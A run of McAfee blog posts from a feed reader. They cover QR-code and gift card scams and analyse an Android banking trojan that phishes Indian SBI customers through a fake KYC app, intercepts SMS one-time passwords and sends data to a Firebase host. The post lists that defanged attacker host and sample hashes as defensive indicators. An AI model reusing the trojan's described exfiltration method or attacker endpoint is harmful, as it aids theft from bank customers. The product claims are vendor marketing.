7. Use scam protection on your phone. Using the power of AI, our new McAfee Scam Protection can alert you when scam texts pop up on your phone. And as a second line of defense, it can block risky sites if you accidentally follow a scam link in a text, email, social media, and more. You’ll find it in our McAfee+ products — along with up to $2 million in identity theft coverage and restoration support if the unfortunate happens to you.
QR codes have made transactions smoother and accessing helpful content on our phones much quicker. As such, we’re seeing them in plenty of places. And useful as they are like other means of paying or browsing online, keep an eye open when using them. With this advice as a guide, if something doesn’t feel right, keep your smartphone in your pocket and away from that QR code.
The post How to Protect Yourself from QR Code Scams appeared first on McAfee Blog.
Crooks love a good gift card scam. It’s like stealing cash right out of your pocket.
That includes Amazon and Target gift cards, Apple and Google gift cards, Vanilla and Visa gift cards too. Scammers go after them all.
In the U.S. and Canada, the Better Business Bureau (BBB), the Federal Trade Commission (FTC), and the Canadian Anti-Fraud Centre have issued warnings about several types of gift card scams floating around this time of year.
The scams fall under three broad categories:
Payment scams — Here, gift card scams take their classic form. A scammer asks for payment with a gift card rather than a payment method a victim can contest, such as a credit card. When victims realize they’ve been scammed, they have no way of getting their money back.
Bogus balance-checking sites — These sites promise to check the balance on gift cards. However, they’re phishing sites. Entering card info into these sites gives scammers everything they need to steal the card balance for themselves.
Gift card tampering — This involves draining gift cards of funds after they’re purchased. Organized crime rackets steal the cards from stores and then restock them on shelves — only after they’ve scanned the barcodes and pin numbers or altered them in some way. When a victim purchases and activates the card, the crooks launder the money and leave the victim with an empty card.
Why all this focus on gift cards? They truly are as good as cash. When that money is gone, it’s gone. Yet better, it can get whisked away electronically quicker than the quickest of pickpockets.
Fortunately, you can avoid these scams rather easily when you know what to look for.
Not great. According to the U.S. Federal Trade Commission (FTC), they received nearly 50,000 reports of gift card fraud in 2022. Those losses racked up more than $250 million. Through September 2023, the BBB and FTC reported a 50% increase in cases of gift card scams over the same period in 2022. So far, that accounts for 29,000 reports and $147 million in losses — a figure that will surely climb much higher as October, November, and December roll by.
Affected cards include the usual list of well-known and reputable brands, such as Walmart, Target, Apple, Google, Amazon, Best Buy, and the Steam gaming platform. Back in 2021, Target gift cards racked up the biggest losses, an average of $2,500 per victim, according to the FTC.
Canada has seen a jump in reports as well. According to the BBB and the Canadian Anti-Fraud Centre, January through August 2023 saw roughly 1,200 reports with $3.5 million in losses for an average loss of roughly $2,900.
If you can imagine a transaction of any kind, a scammer will likely try to get you to pay for it with gift cards.
Some of the more striking examples include scammers who pose as dog breeders who take gift cards as advance payment. They also lurk in online marketplaces and local buy-sell groups, preying on victims looking to buy anything from furniture to golf carts.
And as we’ve reported in the past, scammers often pose as government officials. In these cases, they level heavy threats and demand payment for fines and back taxes, all with gift cards. That’s a sure sign of a scam.
Some scammers go to greater lengths by setting up phony online stores that only accept payment with gift cards. One high-profile example — the phony ticket sites for major sporting events like the Super Bowl and World Cup. Many of those sites offered gift cards as a payment option. In other instances, scammers set up similar bogus storefronts that sell lower-priced items like clothing and bags.
Lastly, we come around to those gift card balance-checking sites, which are really phishing sites. As reported by Tech Times, a user on Reddit uncovered a paid Google ad that directed people to one such site.
Source, Reddit
The ad is on the left. The phishing site is on the right. Note how Target is spelled as “Targets” in the ad, and the address on the phishing site is entirely different than Target.com. Yet that doesn’t stop the scammer from asking for all the info they need to steal funds from the card a victim enters.
Bottom line, if anyone, anywhere, asks you to pay for goods, services, or debts of any kind with a gift card, it’s a scam. Additionally, here’s further advice from us and the BBB:
1. Remember that gift cards are for gifts. Never for payments.
This reinforces the advice above. The crooks who run gift card scams pose as utility companies, the government, lottery officials, tech support from big-name companies, even family members — just about anyone. Yet what all these scams have in common is urgency. Scammers use high-pressure tactics to trick victims into paying with gift cards. And paying quickly.
2. Look for signs of tampering with your physical gift card.
Earlier we mentioned gift card tampering, where scammers either copy or alter the card info and then steal funds when the card is purchased. Signs of tampering include a bar code that’s affixed to the card with a sticker, a PIN that’s been exposed, or packaging that looks like it’s been altered in any way. If possible, purchase gift cards that are behind a counter where they are monitored. This can decrease the risk of purchasing a gift card that’s been tampered with. Also, save your receipt in the event of an issue.
3. Purchase online gift cards from reputable retailers.
One way you can avoid the tampering scenario above is to pick up online gift cards. Several reputable retailers and brands offer them.
4. Check your balance at the retailer or with their official app.
Both can tell you what your card balance is, securely and accurately. Avoid any site online that offers to check your balance for you.
5. Treat your gift cards like cash.
That’s what they are. If the brand or retailer issuing the card allows you to register the card, do so. And if it further allows you to change the PIN, do that as well. This way, you can report card theft with an eye to getting your money back — while changing the PIN can help keep scammers from using the card altogether.
If you fall victim to a scam, report it. Organized crime operations big and small often run them, and reports like yours can help shut them down.
Online protection like ours offers several features that can help steer you clear of scams. It can detect suspicious links, warn you of scam sites, and remove your personal info from sketchy data broker sites.
McAfee Scam Protection: McAfee’s patented and powerful AI technology helps you stay safer amid the rise in phishing scams. Including phishing scams generated by AI. It detects suspicious URLs in texts before they’re opened or clicked on. No more guessing if that text you just got is real or fake.
Web protection: And if you accidentally click on a suspicious link in a text, email, social media, or browser search, our web protection blocks the scam site from loading.
McAfee Personal Data Cleanup: Scammers must have gotten your contact info from somewhere, right? Often, that’s an online data broker — a company that keeps thousands of personal records for millions of people. And they’ll sell those records to anyone. Including scammers. A product like our Personal Data Cleanup can help you remove your info from some of the riskiest sites out there.
It’s gift-giving season, so it comes as no surprise that we’re seeing a spike in gift card scams. What makes this year’s jump so striking is the trending increase over last year’s numbers.
Remembering that gift cards are for gifts and never for payments can help you from falling for one of these scams. That and inspecting gift cards closely for tampering or opting for an online gift card can help as well. And as always, strong online protection like ours helps keep you safer from scammers as you shop, go through your messages, or simply surf around.
The post Gift Card Scams — The Gift That Keeps on Taking appeared first on McAfee Blog.
Authored by Neil Tyagi and Fernando Ruiz
In a digitally evolving world, the convenience of banking through mobile applications has revolutionized financial transactions. However, this advancement has also opened doors to a lesser-known adversary: Android phishing. Join us as we delve into the clandestine realm of cyber threats targeting India’s banking sector.
This blog uncovers the nuances of an Android phishing/banking trojan application identified as Android/Banker.AFX illustrates a common procedure from cybercriminals designed to drain the bank accounts of their victims:
First broadcasting phishing messages via WhatsApp and luring users to install an app that carries malicious code hidden as a verification tool. Once installed, the banking trojan can collect personal and financial information plus intercept SMS messages with the objective of stealing one-time passwords or verification codes that are required to complete transactions which may lead to stealing the banking account assets.
This trojan is just a variant and example of multiple banking trojans implementations recently observed in the wild that carry similar risks, which is not technically sophisticated but might be very effective and prevalent especially when it’s widely distributed on social media. McAfee Mobile Security protects broadly and generically against this type of banking trojans.
This blog explores the insidious tactics, alarming trends, and preventive measures against the rising tide of phishing attacks plaguing Android users in India’s financial landscape.
A sense of urgency is created for the user by warning him that the account would be blocked if he doesn’t install the APK and provide the necessary information to complete the KYC form.
These seemingly innocent prompts, meticulously crafted by cybercriminals, possess a cunning sophistication that mirrors the legitimate communication channels of banking institutions. They prey upon human curiosity, fear, and desire, tricking users into taking immediate actions that, at first glance, seem innocuous but have far-reaching consequences.
Since the app installer is triggered by Whatsapp, the installation by default should be blocked by Android unless the user previously allowed the installation of unknown apps from this source.
A warning is displayed after taping on the APK icon:
However, if users ignore the warning, they may deactivate this important security feature with just two clicks:
Now Android OS is warning about the risk of allowing the installation of unknown apps from WhatsApp. However, many users allow this option, which poses a high risk of infection.
Once the Trojan is installed, the victims will get the financial institution icon on their Android app list:
After installation, it abuses the icon of SBI to confuse the user.
Opening for the first time, it asks for SMS-related permissions.
The application’s landing page is similar to the net banking page of Real SBI.
This phishing site is locally loaded from the malware into a WebView.
The application asks for the user’s username, password, and phone number.
The Captcha used here is static. It does not change ever because all content is hardcoded locally.
As part of the KYC validation lure process, the malware collects sensitive user information such as:
After the victim inputs all the information, they are presented with a fake KYC validation code, which makes it look like a genuine procedure the user might not be suspicious about the app or the process.
Additionally, this banking trojan intercepts SMS messages and abuses Firebase to communicate with attackers. During the analysis the malware transmitted all collected information including credit card information to:
wss[:]//s-usc1a-nss-2003.firebaseio.com/.ws?v=5&ns=zero-a4c52-default-rtdb
According to the static analysis, any received SMS message would also be exfiltrated to the attackers’ servers via the opened socket communication since the app has granted SMS reading permissions at the first execution. This is implemented to extract any OTP required to complete transactions of the victim.
Exfiltrated credit card information from the local static site loaded by the malware abuses the Cordova framework. Credit card information, along with all collected information, is transmitted to the attackers using Firebase, a legitimate service that’s also abused by criminals.
Android/Banker.AXF!ML infections around the world: India is the target.
Banking trojans are not new or sophisticated but they are a persistent threat due to the lucrative business that poses for malware authors which can lure many victims that are unaware of the risk of phishing. As these campaigns can be massive even if a small percentage of targeted victims fall the criminals can have a large loot.
Cybercriminals are constantly improving their social engineering tricks to lure users into phishing and malware. The first line of defense against these threats is the user’s awareness. Some generic advises are:
McAfee Antivirus emerges as a formidable ally in the battle against Android phishing within India’s banking sector. With its robust suite of security features tailored for mobile devices, McAfee stands as a bulwark, providing critical defense mechanisms against the ever-mutating landscape of cyber threats.
| Hash | Package |
| 7cfc6360e69d22b09a28c940caf628959d11176e27b8a03e15b020b369569415 | hello.uwer.hello.hello.google.is.the.best |
| b067f5903e23288842ad056d4b31299b3b30052abe69bee236136b2b9fcab6a8 | hello.uwer.hello.hello.google.is.the.best |
| e2e097ef433be75dcab830baa4b08feb4a24267c46b568fd4aef00dbb081ed8f | hello.uwer.hello.hello.google.is.the.best |
| 9f046f769760d52a97680a91fd511f1e86c428b9eec27d7eb486b7b4d0666f0b | hello.uwer.hello.hello.google.is.the.best |
| 1c69b0a69ed1631a1f1b54627a9b5dac3b214a275280de36d05ee75021cbfb04 | hello.uwer.hello.hello.google.is.the.best |
| 495ab4efd3d1ec9bfc2d08d80df316aad20dc76e625374627fabea06f5151584 | hello.uwer.hello.hello.google.is.the.best |
| 6190144b56e06af8aeeeba2104a665a555d01f6ec2a22ba78212d943ac2b258d | hello.uwer.hello.hello.google.is.the.best |
| 6c6ea9fbeae967fb53ab9984edda9b754fb6d3f85b4ff5b14e1fd33399362ba4 | hello.uwer.hello.hello.google.is.the.best |
Abused Firebase host : Wss[:]//s-usc1a-nss-2003.firebaseio.com/.ws?v=5&ns=zero-a4c52-default-rtdb
The post Shielding Against Android Phishing in Indian Banking appeared first on McAfee Blog.
FreshRSS 